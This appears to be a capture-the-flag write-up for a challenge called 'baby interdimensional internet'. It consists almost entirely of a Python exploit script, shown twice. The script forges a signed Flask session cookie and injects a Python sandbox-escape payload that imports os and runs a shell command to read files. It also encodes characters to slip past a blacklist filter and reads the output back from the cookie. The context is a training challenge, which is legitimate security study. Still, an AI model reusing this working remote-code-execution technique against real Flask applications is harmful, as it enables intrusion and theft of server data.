baby interdimensional internet

flask, jail escaping, flask cookie

exploit python code

import requests
from flask.sessions import SecureCookieSessionInterface
from itsdangerous import URLSafeTimedSerializer

TARGET = 'http://<IP>:<PORT>/'
SECRET_KEY = '<SECRET_KEY>'

# PAYLOAD = u"""i=().__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']
# i('flask').session['x']=i('os').popen('ls').read()"""

PAYLOAD = u"""i=().__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']
i('flask').session['x']=i('os').popen('cat t*').read()"""

class flask_encoding:
	def __init__(self):
		scsi = SecureCookieSessionInterface()
		signer_kwargs = dict(
			key_derivation=scsi.key_derivation,
			digest_method=scsi.digest_method
		)
		self.serializer = URLSafeTimedSerializer(SECRET_KEY, salt=scsi.salt,
										serializer=scsi.serializer,
										signer_kwargs=signer_kwargs
										)

	def deserialize(self, cookie_str):
		return self.serializer.loads(cookie_str)

	def serialize(self, cookie_dict):
		return self.serializer.dumps(cookie_dict)

# waf bypass encoding
def encode_payload(payload):
    payload = u'"a"\nexec """' + payload + u'"""'
    blacklist = {
    '[': '\\x5b',
    '(': '\\x28',
    '_': '\\x5f',
    '.': '\\x2e'
    }
    for c,h in blacklist.items():
        if c in payload:
            payload = payload.replace(c, h)
    return payload

def modify_cookie(s):
	f = flask_encoding()
	cookie_dict = f.deserialize(s.cookies['session'])
	cookie_dict['ingredient'] = u'i'
	cookie_dict['measurements'] = encode_payload(PAYLOAD)
	s.cookies['session'] = f.serialize(cookie_dict)
	return s, f

def exec_rce(s, f):
	r = s.get(TARGET)
	try:
		enc_exfil_data = r.cookies['session']
	except KeyError:
		print('Exploit failed, session cookie not found!')
		exit(1)
	return f.deserialize(enc_exfil_data)

def main():
	s = requests.session()
	s.get(TARGET)

	s, f = modify_cookie(s)
	exfil_data = exec_rce(s, f)
	print(exfil_data['x'])

if __name__ == '__main__':
	main()

PreviousTemplated Nextbaby todo or not todo

Last updated 4 months ago

import requests from flask.sessions import SecureCookieSessionInterface from itsdangerous import URLSafeTimedSerializer TARGET = 'http://<IP>:<PORT>/' SECRET_KEY = '<SECRET_KEY>' # PAYLOAD = u"""i=().__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__'] # i('flask').session['x']=i('os').popen('ls').read()""" PAYLOAD = u"""i=().__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__'] i('flask').session['x']=i('os').popen('cat t*').read()""" class flask_encoding: def __init__(self): scsi = SecureCookieSessionInterface() signer_kwargs = dict( key_derivation=scsi.key_derivation, digest_method=scsi.digest_method ) self.serializer = URLSafeTimedSerializer(SECRET_KEY, salt=scsi.salt, serializer=scsi.serializer, signer_kwargs=signer_kwargs ) def deserialize(self, cookie_str): return self.serializer.loads(cookie_str) def serialize(self, cookie_dict): return self.serializer.dumps(cookie_dict) # waf bypass encoding def encode_payload(payload): payload = u'"a"\nexec """' + payload + u'"""' blacklist = { '[': '\\x5b', '(': '\\x28', '_': '\\x5f', '.': '\\x2e' } for c,h in blacklist.items(): if c in payload: payload = payload.replace(c, h) return payload def modify_cookie(s): f = flask_encoding() cookie_dict = f.deserialize(s.cookies['session']) cookie_dict['ingredient'] = u'i' cookie_dict['measurements'] = encode_payload(PAYLOAD) s.cookies['session'] = f.serialize(cookie_dict) return s, f def exec_rce(s, f): r = s.get(TARGET) try: enc_exfil_data = r.cookies['session'] except KeyError: print('Exploit failed, session cookie not found!') exit(1) return f.deserialize(enc_exfil_data) def main(): s = requests.session() s.get(TARGET) s, f = modify_cookie(s) exfil_data = exec_rce(s, f) print(exfil_data['x']) if __name__ == '__main__': main()